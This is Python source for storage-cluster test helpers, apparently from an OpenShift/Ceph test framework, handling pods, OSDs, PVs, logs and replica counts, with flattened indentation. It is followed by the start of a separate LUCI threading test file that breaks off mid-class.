user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN["username"]
if not password:
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["password_location"]
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["kubeconfig_location"]
)
file_path = os.path.dirname(filename)
master_list = node.get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = "auth"
check_conf = "kubeconfig"
node_path = "/home/core/"
if check_auth not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}auth"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
def create_dummy_osd(deployment):
"""
Replace one of the OSD pods with a pod that contains all data from the original
OSD but doesn't run the osd daemon. This can be used e.g. for direct access
to Ceph Placement Groups.
Args:
deployment (str): Name of deployment to use
Returns:
list: first item is dummy deployment object, second item is dummy pod
object
"""
oc = OCP(
kind=constants.DEPLOYMENT, namespace=config.ENV_DATA.get("cluster_namespace")
)
osd_data = oc.get(deployment)
dummy_deployment = create_unique_resource_name("dummy", "osd")
osd_data["metadata"]["name"] = dummy_deployment
osd_containers = osd_data.get("spec").get("template").get("spec").get("containers")
# get osd container spec
original_osd_args = osd_containers[0].get("args")
osd_data["spec"]["template"]["spec"]["containers"][0]["args"] = []
osd_data["spec"]["template"]["spec"]["containers"][0]["command"] = [
"/bin/bash",
"-c",
"sleep infinity",
]
osd_file = tempfile.NamedTemporaryFile(
mode="w+", prefix=dummy_deployment, delete=False
)
with open(osd_file.name, "w") as temp:
yaml.dump(osd_data, temp)
oc.create(osd_file.name)
# downscale the original deployment and start dummy deployment instead
oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
osd_list = pod.get_osd_pods()
dummy_pod = [pod for pod in osd_list if dummy_deployment in pod.name][0]
wait_for_resource_state(
resource=dummy_pod, state=constants.STATUS_RUNNING, timeout=60
)
ceph_init_cmd = "/rook/tini" + " " + " ".join(original_osd_args)
try:
logger.info("Following command should expire after 7 seconds")
dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
except TimeoutExpired:
logger.info("Killing /rook/tini process")
try:
dummy_pod.exec_sh_cmd_on_pod(
"kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
)
except CommandFailed:
pass
return dummy_deployment, dummy_pod
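# Illustrative usage (hypothetical deployment name, not from the original module):
#   dummy_deployment, dummy_pod = create_dummy_osd("rook-ceph-osd-0")
#   # the dummy pod carries the OSD's data but no running daemon, so tools that
#   # need exclusive access to the OSD's store can be run inside it; when done,
#   # scale the dummy deployment back to 0 and the original one back to 1.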
def get_failure_domin():
"""
Function to get the failure domain of the pool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format="json")
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
In node failure scenarios in which the selected node is
running the ceph tools pod, we'll want to wait for the pod to recover
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods,
previous_num=1,
namespace=config.ENV_DATA["cluster_namespace"],
timeout=120,
selector=constants.TOOL_APP_LABEL,
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
Function to label worker node for running app pods on specific worker nodes.
Args:
node_list (list): List of node names
label_key (str): Label key to be added to the worker nodes
label_value (str): Label value
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}",
out_yaml_format=False,
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
node_list (list): List of node names
label_key (str): Label key to be removed from the worker nodes
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
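# Illustrative usage (hypothetical node names and label, not from the original module):
#   label_worker_node(["worker-0", "worker-1"], "nodetype", "app-pod")
#   # ... run app pods pinned to these nodes via a matching nodeSelector ...
#   remove_label_from_worker_node(["worker-0", "worker-1"], "nodetype")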
def get_pods_nodes_logs():
"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, "w") as fh:
fh.write(log_content)
return output_logs
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
resource_name (str): Name of the osd pod, e.g. 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True if the changes are applied, False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
resource_name = "-".join(resource_name.split("-")[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
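# Illustrative note: the name truncation above turns an OSD pod name such as
# "rook-ceph-osd-0-c9c4bc7c-bkf4b" into its first four dash-separated parts,
# i.e. the deployment name "rook-ceph-osd-0", which is what gets patched.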
def modify_deployment_replica_count(deployment_name, replica_count):
"""
Function to modify deployment replica count,
i.e to scale up or down deployment
Args:
deployment_name (str): Name of deployment
replica_count (int): replica count to be changed to
Returns:
bool: True if the changes are applied, False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=deployment_name, params=params)
def collect_performance_stats(dir_name):
"""
Collect performance stats and save them to a file in json format.
Args:
dir_name (str): directory name to store stats.
Performance stats include:
IOPs and throughput percentage of the cluster
CPU and memory consumption of each node
"""
from ocs_ci.ocs.cluster import CephCluster
log_dir_path = os.path.join(
os.path.expanduser(config.RUN["log_dir"]),
f"failed_testcase_ocs_logs_{config.RUN['run_id']}",
f"{dir_name}_performance_stats",
)
if not os.path.exists(log_dir_path):
logger.info(f"Creating directory {log_dir_path}")
os.makedirs(log_dir_path)
performance_stats = {}
external = config.DEPLOYMENT["external_mode"]
if external:
# Skip collecting performance_stats for external mode RHCS cluster
logging.info("Skipping status collection for external mode")
else:
ceph_obj = CephCluster()
# Get iops and throughput percentage of cluster
iops_percentage = ceph_obj.get_iops_percentage()
throughput_percentage = ceph_obj.get_throughput_percentage()
performance_stats["iops_percentage"] = iops_percentage
performance_stats["throughput_percentage"] = throughput_percentage
# ToDo: Get iops and throughput percentage of each nodes
# Get the cpu and memory of each nodes from adm top
master_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="master")
)
worker_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="worker")
)
# Get the cpu and memory from describe of nodes
master_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="master")
)
worker_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="worker")
)
performance_stats["master_node_utilization"] = master_node_utilization_from_adm_top
performance_stats["worker_node_utilization"] = worker_node_utilization_from_adm_top
performance_stats[
"master_node_utilization_from_oc_describe"
] = master_node_utilization_from_oc_describe
performance_stats[
"worker_node_utilization_from_oc_describe"
] = worker_node_utilization_from_oc_describe
file_name = os.path.join(log_dir_path, "performance")
with open(file_name, "w") as outfile:
json.dump(performance_stats, outfile)
def validate_pod_oomkilled(
pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE, container=None
):
"""
Check the pod's previous log for OOM kill messages
Args:
pod_name (str): Name of the pod
namespace (str): Namespace of the pod
container (str): Name of the container
Returns:
bool: True if oomkill messages are not found in the log,
False otherwise.
Raises:
AssertionError: If the logs could not be fetched
"""
rc = True
try:
pod_log = pod.get_pod_logs(
pod_name=pod_name, namespace=namespace, container=container, previous=True
)
result = pod_log.find("signal: killed")
if result != -1:
rc = False
except CommandFailed as ecf:
assert (
f'previous terminated container "{container}" in pod "{pod_name}" not found'
in str(ecf)
), "Failed to fetch logs"
return rc
def validate_pods_are_running_and_not_restarted(pod_name, pod_restart_count, namespace):
"""
Validate that the given pod is in Running state and has not been restarted or re-spun
Args:
pod_name (str): Name of the pod
pod_restart_count (int): Restart count of pod
namespace (str): Namespace of the pod
Returns:
bool : True if pod is in running state and restart
count matches the previous one
"""
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
pod_obj = ocp_obj.get(resource_name=pod_name)
restart_count = (
pod_obj.get("status").get("containerStatuses")[0].get("restartCount")
)
pod_state = pod_obj.get("status").get("phase")
if pod_state == "Running" and restart_count == pod_restart_count:
logger.info("Pod is running state and restart count matches with previous one")
return True
logger.error(
f"Pod is in {pod_state} state and restart count of pod {restart_count}"
)
logger.info(f"{pod_obj}")
return False
def calc_local_file_md5_sum(path):
"""
Calculate and return the MD5 checksum of a local file
Args:
path (str): The path to the file
Returns:
str: The MD5 checksum
"""
with open(path, "rb") as file_to_hash:
file_as_bytes = file_to_hash.read()
return hashlib.md5(file_as_bytes).hexdigest()
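# Hedged sketch (not part of the original module): for large files, hashing in
# fixed-size chunks avoids reading the whole file into memory at once. It
# produces the same digest as calc_local_file_md5_sum above.
def _calc_local_file_md5_sum_chunked(path, chunk_size=4 * 1024 * 1024):
    md5 = hashlib.md5()
    with open(path, "rb") as file_to_hash:
        # read() returns b"" at EOF, which terminates the iterator
        for chunk in iter(lambda: file_to_hash.read(chunk_size), b""):
            md5.update(chunk)
    return md5.hexdigest()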
def retrieve_default_ingress_crt():
"""
Copy the default ingress certificate from the router-ca secret
to the local code runner for usage with boto3.
"""
default_ingress_crt_b64 = (
OCP(
kind="secret",
namespace="openshift-ingress-operator",
resource_name="router-ca",
)
.get()
.get("data")
.get("tls.crt")
)
decoded_crt = base64.b64decode(default_ingress_crt_b64).decode("utf-8")
with open(constants.DEFAULT_INGRESS_CRT_LOCAL_PATH, "w") as crtfile:
crtfile.write(decoded_crt)
def storagecluster_independent_check():
"""
Check whether the storagecluster is running in independent mode
by checking the value of spec.externalStorage.enable
Returns:
bool: True if the storagecluster is running in external mode, False otherwise
"""
storage_cluster = (
OCP(kind="StorageCluster", namespace=config.ENV_DATA["cluster_namespace"])
.get()
.get("items")[0]
)
return bool(
storage_cluster.get("spec", {}).get("externalStorage", {}).get("enable", False)
)
def get_pv_size(storageclass=None):
"""
Get PV sizes for the requested storageclass
Args:
storageclass (str): Name of the storageclass
Returns:
list: list of PV sizes
"""
return_list = []
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
for pv_obj in pv_objs:
if pv_obj["spec"]["storageClassName"] == storageclass:
return_list.append(pv_obj["spec"]["capacity"]["storage"])
return return_list
def get_pv_names():
"""
Get PV names
Returns:
list: list of pv names
"""
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
return [pv_obj["metadata"]["name"] for pv_obj in pv_objs]
def default_volumesnapshotclass(interface_type):
"""
Return default VolumeSnapshotClass based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: VolumeSnapshotClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_RBD
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_RBD
)
elif interface_type == constants.CEPHFILESYSTEM:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_CEPHFS
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_CEPHFS
)
base_snapshot_class = OCP(
kind=constants.VOLUMESNAPSHOTCLASS, resource_name=resource_name
)
return OCS(**base_snapshot_class.data)
def get_snapshot_content_obj(snap_obj):
"""
Get volume snapshot content of a volume snapshot
Args:
snap_obj (OCS): OCS instance of kind VolumeSnapshot
Returns:
OCS: OCS instance of kind VolumeSnapshotContent
"""
data = dict()
data["api_version"] = snap_obj.api_version
data["kind"] = constants.VOLUMESNAPSHOTCONTENT
snapcontent = snap_obj.ocp.get(resource_name=snap_obj.name, out_yaml_format=True)[
"status"
]["boundVolumeSnapshotContentName"]
data["metadata"] = {"name": snapcontent, "namespace": snap_obj.namespace}
snapcontent_obj = OCS(**data)
snapcontent_obj.reload()
return snapcontent_obj
def wait_for_pv_delete(pv_objs):
"""
Wait for PVs to delete. Delete PVs having ReclaimPolicy 'Retain'
Args:
pv_objs (list): OCS instances of kind PersistentVolume
"""
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
@retry(UnexpectedBehaviour, tries=20, delay=10, backoff=1)
def fetch_used_size(cbp_name, exp_val=None):
"""
Fetch the used size of the pool
Args:
cbp_name (str): Name of the ceph block pool
exp_val (float): Expected used size in GB; a mismatch of more than 1.5 GB triggers a retry
Returns:
float: Used size in GB
"""
ct_pod = pod.get_ceph_tools_pod()
rados_status = ct_pod.exec_ceph_cmd(ceph_cmd=f"rados df -p {cbp_name}")
size_bytes = rados_status["pools"][0]["size_bytes"]
# Convert size to GB
used_in_gb = float(format(size_bytes / constants.GB, ".4f"))
if exp_val and abs(exp_val - used_in_gb) > 1.5:
raise UnexpectedBehaviour(
f"Actual {used_in_gb} and expected size {exp_val} not "
f"matching. Retrying"
)
return used_in_gb
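# Illustrative usage (hypothetical pool name): the @retry decorator keeps calling
# fetch_used_size until the measured usage is within 1.5 GB of exp_val, retrying
# up to 20 times with a 10 second delay before the exception is finally raised:
#   used_size = fetch_used_size("my-cephblockpool", exp_val=10.0)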
def get_full_test_logs_path(cname):
"""
Get the full path of the log file for a particular test.
This function uses the inspect module to find the name of the caller function, so it needs
to be called directly from the main test function.
The output is in the form of
ocsci_log_path/<full test file path>/<test filename>/<test class name>/<test function name>
Args:
cname (obj): the Class object which was run and called this function
Return:
str : full path of the test logs relative to the ocs-ci base logs path
"""
# the module path relative to ocs-ci base path
log_file_name = (inspect.stack()[1][1]).replace(f"{os.getcwd()}/", "")
# The name of the class
mname = type(cname).__name__
# the full log path (relative to ocs-ci base path)
full_log_path = (
f"{ocsci_log_path()}/{log_file_name}/{mname}/{inspect.stack()[1][3]}"
)
return full_log_path
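# Illustrative usage (hypothetical test class, not from the original module):
#   class TestScale:
#       def test_create_pvcs(self):
#           log_path = get_full_test_logs_path(cname=self)
#           # -> <ocsci_log_path>/<test file path>/TestScale/test_create_pvcs
# Because the path is derived from the immediate caller via inspect.stack(),
# it must be called directly from the test function itself.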
def get_mon_pdb():
"""
Check for Mon PDB
Returns:
disruptions_allowed (int): Count of mon allowed disruption
min_available_mon (int): Count of minimum mon available
max_unavailable_mon (int): Count of maximum mons unavailable
"""
pdb_obj = OCP(
kind=constants.POD_DISRUPTION_BUDGET,
resource_name=constants.MON_PDB,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
)
disruptions_allowed = pdb_obj.get().get("status").get("disruptionsAllowed")
min_available_mon = pdb_obj.get().get("spec").get("minAvailable")
max_unavailable_mon = pdb_obj.get().get("spec").get("maxUnavailable")
return disruptions_allowed, min_available_mon, max_unavailable_mon
def verify_pdb_mon(disruptions_allowed, max_unavailable_mon):
"""
Compare between the PDB status and the expected PDB status
Args:
disruptions_allowed (int): the expected number of disruptions_allowed
max_unavailable_mon (int): the expected number of max_unavailable_mon
Returns:
bool: True if the expected pdb state equal to actual pdb state, False otherwise
"""
logging.info("Check mon pdb status")
mon_pdb = get_mon_pdb()
result = True
if disruptions_allowed != mon_pdb[0]:
result = False
logger.error(
f"The expected disruptions_allowed is: {disruptions_allowed}.The actual one is {mon_pdb[0]}"
)
if max_unavailable_mon != mon_pdb[2]:
result = False
logger.error(
f"The expected max_unavailable_mon is {max_unavailable_mon}.The actual one is {mon_pdb[2]}"
)
return result
@retry(CommandFailed, tries=10, delay=30, backoff=1)
def run_cmd_verify_cli_output(
cmd=None, expected_output_lst=(), cephtool_cmd=False, debug_node=None
):
"""
Run command and verify its output
Args:
cmd (str): cli command
expected_output_lst (set): A set of strings that need to be included in the command output.
cephtool_cmd (bool): True to run the command on the ceph tools pod
debug_node (str): Name of the node on which to run the command via 'oc debug'
Returns:
bool: True if all strings are included in the command output, False otherwise
"""
if cephtool_cmd is True:
tool_pod = pod.get_ceph_tools_pod()
cmd_start = f"oc rsh -n openshift-storage {tool_pod.name} "
cmd = f"{cmd_start} {cmd}"
elif debug_node is not None:
cmd_start = f"oc debug nodes/{debug_node} -- chroot /host /bin/bash -c "
cmd = f'{cmd_start} "{cmd}"'
out = run_cmd(cmd=cmd)
logger.info(out)
for expected_output in expected_output_lst:
if expected_output not in out:
return False
return True
def check_rbd_image_used_size(
pvc_objs, usage_to_compare, rbd_pool=constants.DEFAULT_BLOCKPOOL, expect_match=True
):
"""
Check if RBD image used size of the PVCs are matching with the given value
Args:
pvc_objs (list): List of PVC objects
usage_to_compare (str): Value of image used size to be compared with actual value. eg: "5GiB"
rbd_pool (str): Name of the pool
expect_match (bool): True to verify the used size is equal to 'usage_to_compare' value.
False to verify the used size is not equal to 'usage_to_compare' value.
Returns:
bool: True if the verification is success for all the PVCs, False otherwise
"""
ct_pod = pod.get_ceph_tools_pod()
no_match_list = []
for pvc_obj in pvc_objs:
rbd_image_name = pvc_obj.get_rbd_image_name
du_out = ct_pod.exec_ceph_cmd(
ceph_cmd=f"rbd du -p {rbd_pool} {rbd_image_name}",
format="",
)
used_size = "".join(du_out.strip().split()[-2:])
if expect_match:
if usage_to_compare != used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation."
f" Expected used size: {usage_to_compare}. Actual used size: {used_size}. "
f"Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
else:
if usage_to_compare == used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation. "
f"Expected the used size to be diferent than {usage_to_compare}. "
f"Actual used size: {used_size}. Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
if no_match_list:
logger.error(
f"RBD image used size of these PVCs did not meet the expectation - {no_match_list}"
)
return False
return True
def set_configmap_log_level_rook_ceph_operator(value):
"""
Set ROOK_LOG_LEVEL on configmap of rook-ceph-operator
Args:
value (str): Log level to set, e.g. DEBUG, INFO or WARNING
"""
path = "/data/ROOK_LOG_LEVEL"
params = f"""[{{"op": "add", "path": "{path}", "value": "{value}"}}]"""
configmap_obj = OCP(
kind=constants.CONFIGMAP,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
resource_name=constants.ROOK_OPERATOR_CONFIGMAP,
)
logger.info(f"Setting ROOK_LOG_LEVEL to: {value}")
configmap_obj.patch(params=params, format_type="json")
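# Illustrative note: for value "DEBUG" the JSON patch rendered above is
#   [{"op": "add", "path": "/data/ROOK_LOG_LEVEL", "value": "DEBUG"}]
# and it is applied to the configmap named by constants.ROOK_OPERATOR_CONFIGMAP
# using JSON-patch semantics (format_type="json").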
def get_logs_rook_ceph_operator():
"""
Get logs from a rook_ceph_operator pod
Returns:
str: Output of the 'oc logs' command for the rook-ceph-operator pod
"""
logger.info("Get logs from rook_ceph_operator pod")
rook_ceph_operator_objs = pod.get_operator_pods()
return pod.get_pod_logs(pod_name=rook_ceph_operator_objs[0].name)
def check_osd_log_exist_on_rook_ceph_operator_pod(
last_log_date_time_obj, expected_strings=(), unexpected_strings=()
):
"""
Verify logs contain the expected strings and the logs do not
contain the unexpected strings
Args:
last_log_date_time_obj (datetime obj): Datetime of the last operator log line before the check; only newer lines are examined
expected_strings (list): verify the logs contain the expected strings
unexpected_strings (list): verify the logs do not contain the strings
Returns:
bool: True if logs contain the expected strings and the logs do not
contain the unexpected strings, False otherwise
"""
logger.info("Respin OSD pod")
osd_pod_objs = pod.get_osd_pods()
osd_pod_obj = random.choice(osd_pod_objs)
osd_pod_obj.delete()
new_logs = list()
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj and log_date_time_obj > last_log_date_time_obj:
new_logs.append(line)
res_expected = False
res_unexpected = True
for new_log in new_logs:
if all(
expected_string.lower() in new_log.lower()
for expected_string in expected_strings
):
res_expected = True
logger.info(f"{new_log} contain expected strings {expected_strings}")
break
for new_log in new_logs:
if any(
unexpected_string.lower() in new_log.lower()
for unexpected_string in unexpected_strings
):
logger.error(f"{new_log} contain unexpected strings {unexpected_strings}")
res_unexpected = False
break
return res_expected & res_unexpected
def get_last_log_time_date():
"""
Get last log time
Returns:
last_log_date_time_obj (datetime obj): Datetime of the last line in the rook-ceph-operator logs
"""
logger.info("Get last log time")
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj:
last_log_date_time_obj = log_date_time_obj
return last_log_date_time_obj
def clear_crash_warning_and_osd_removal_leftovers():
"""
Clear crash warnings and osd removal leftovers. This function can be used for example,
after the device replacement test or the node replacement test.
"""
is_deleted = pod.delete_all_osd_removal_jobs()
if is_deleted:
logger.info("Successfully deleted all the ocs-osd-removal jobs")
is_osd_pods_running = pod.wait_for_pods_to_be_running(
pod_names=[osd_pod.name for osd_pod in pod.get_osd_pods()], timeout=120
)
if not is_osd_pods_running:
logger.warning("There are still osds down. Can't clear ceph crash warnings")
return
is_daemon_recently_crash_warnings = run_cmd_verify_cli_output(
cmd="ceph health detail",
expected_output_lst={"HEALTH_WARN", "daemons have recently crashed"},
cephtool_cmd=True,
)
if is_daemon_recently_crash_warnings:
logger.info("Clear all ceph crash warnings")
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd(ceph_cmd="ceph crash archive-all")
else:
logger.info("There are no daemon crash warnings")
def get_noobaa_url():
"""
Get the URL of noobaa console
Returns:
str: url of noobaa console
"""
ocp_obj = OCP(kind=constants.ROUTE, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
route_obj = ocp_obj.get(resource_name="noobaa-mgmt")
return route_obj["spec"]["host"]
def select_unique_pvcs(pvcs):
"""
Get the PVCs with unique access mode and volume mode combination.
Args:
pvcs(list): List of PVC objects
Returns:
list: List of selected PVC objects
"""
pvc_dict = {}
for pvc_obj in pvcs:
pvc_data = pvc_obj.get()
access_mode_volume_mode = (
pvc_data["spec"]["accessModes"][0],
pvc_data["spec"].get("volumeMode"),
)
pvc_dict[access_mode_volume_mode] = pvc_dict.get(
access_mode_volume_mode, pvc_obj
)
return pvc_dict.values()
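# Illustrative example: given three PVCs whose (accessMode, volumeMode) pairs are
# (RWO, Filesystem), (RWO, Filesystem) and (RWX, Block), only the first PVC of
# each distinct combination is kept, so two PVC objects are returned.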
def mon_pods_running_on_same_node():
"""
Verify that no two mons are running on the same node
Raises:
UnexpectedBehaviour: If two or more mons are running on the same node
"""
mon_running_nodes = node.get_mon_running_nodes()
if len(mon_running_nodes) != len(set(mon_running_nodes)):
logger.error(f"Mons running on nodes: {mon_running_nodes}")
raise UnexpectedBehaviour("Two or more mons running on same node")
logger.info("Mons are running on different nodes")
def get_failure_domain():
"""
Get Failure Domain
Returns:
string: type of failure domain
"""
from ocs_ci.ocs.resources.storage_cluster import get_storage_cluster
storage_cluster_obj = get_storage_cluster()
return storage_cluster_obj.data["items"][0]["status"]["failureDomain"]
def modify_statefulset_replica_count(statefulset_name, replica_count):
"""
Function to modify statefulset replica count,
i.e to scale up or down statefulset
Args:
statefulset_name (str): Name of the statefulset
replica_count (int): replica count to be changed to
Returns:
bool: True if the changes are applied, False otherwise
"""
ocp_obj = OCP(kind=constants.STATEFULSET, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=statefulset_name, params=params)
def get_event_line_datetime(event_line):
"""
Get the event line datetime
Args:
event_line (str): The event line to get its datetime from
Returns:
datetime object: The event line datetime
"""
if re.search(r"\d{4}-\d{2}-\d{2}", event_line):
return datetime.datetime.strptime(event_line[:26], "%Y-%m-%d %H:%M:%S.%f")
else:
return None
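# Illustrative example (hedged): an operator log line starting with a timestamp
# such as "2021-06-01 12:34:56.789012 I | op-osd: ..." yields
# datetime.datetime(2021, 6, 1, 12, 34, 56, 789012), since the first 26
# characters match "%Y-%m-%d %H:%M:%S.%f"; lines without such a timestamp
# return None.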
def get_rook_ceph_pod_events(pod_name):
"""
Get the rook ceph pod events from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
Returns:
list: List of all the event lines with the specific pod
"""
rook_ceph_operator_event_lines = get_logs_rook_ceph_operator().splitlines()
return [line for line in rook_ceph_operator_event_lines if pod_name in line]
def get_rook_ceph_pod_events_by_keyword(pod_name, keyword):
"""
Get the rook ceph pod events with the keyword 'keyword' from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
keyword (str): The keyword to search in the events
Returns:
list: List of all the event lines with the specific pod that has the keyword 'keyword'
"""
pod_event_lines = get_rook_ceph_pod_events(pod_name)
return [
event_line
for event_line in pod_event_lines
if keyword.lower() in event_line.lower()
]
def wait_for_rook_ceph_pod_status(pod_obj, desired_status, timeout=420):
"""
Wait for the rook ceph pod to reach the desired status. If the pod didn't reach the
desired status, check if the reason is that the pod is not found. If this is the case,
check in the rook ceph pod operator logs to see if the pod reached the desired status.
Args:
pod_obj (ocs_ci.ocs.resources.pod.Pod): The rook ceph pod object
desired_status (str): The desired status of the pod to wait for
timeout (int): time to wait for the pod to reach the desired status
Returns:
bool: True if the rook ceph pod reached the desired status, False otherwise
"""
start_log_datetime = get_last_log_time_date()
try:
wait_for_resource_state(pod_obj, desired_status, timeout=timeout)
except (ResourceWrongStatusException, CommandFailed) as e:
if "not found" in str(e):
logger.info(
f"Failed to find the pod {pod_obj.name}. Trying to search for the event "
f"in rook ceph operator logs..."
)
pod_event_lines_with_desired_status = get_rook_ceph_pod_events_by_keyword(
pod_obj.name, keyword=desired_status
)
last_pod_event_line = pod_event_lines_with_desired_status[-1]
last_pod_event_datetime = get_event_line_datetime(last_pod_event_line)
if last_pod_event_datetime > start_log_datetime:
logger.info(
f"Found the event of pod {pod_obj.name} with status {desired_status} in "
f"rook ceph operator logs. The event line is: {last_pod_event_line}"
)
return True
else:
return False
else:
logger.info(f"An error has occurred when trying to get the pod object: {e}")
return False
return True
|
threading_utils_test.py
|
#!/usr/bin/env vpython3
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import functools
import signal
import sys
import threading
import time
import traceback
import unittest
# Mutates sys.path.
import test_env
from utils import threading_utils
def timeout(max_running_time):
"""Test method decorator that fails the test if it executes longer
than |max_running_time| seconds.
It exists to terminate tests in case of deadlocks. There's a high chance that
process is broken after such timeout (due to hanging deadlocked threads that
can own some shared resources). But failing early (maybe not in a cleanest
way) due to timeout is generally better than hanging indefinitely.
|max_running_time| should be an order of magnitude (or even two orders) larger
than the expected run time of the test to compensate for slow machine, high
CPU utilization by some other processes, etc.
Can not be nested.
Noop on windows (since win32 doesn't support signal.setitimer).
"""
if sys.platform == 'win32':
return lambda method: method
def decorator(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
signal.signal(signal.SIGALRM, lambda *_args: self.fail('Timeout'))
signal.setitimer(signal.ITIMER_REAL, max_running_time)
try:
return method(self, *args, **kwargs)
finally:
signal.signal(signal.SIGALRM, signal.SIG_DFL)
signal.setitimer(signal.ITIMER_REAL, 0)
return wrapper
return decorator
class ThreadPoolTest(unittest.TestCase):
MIN_THREADS = 0
MAX_THREADS = 32
# Append custom assert messages to default ones (works with python >= 2.7).
longMessage = True
@staticmethod
def sleep_task(duration=0.01):
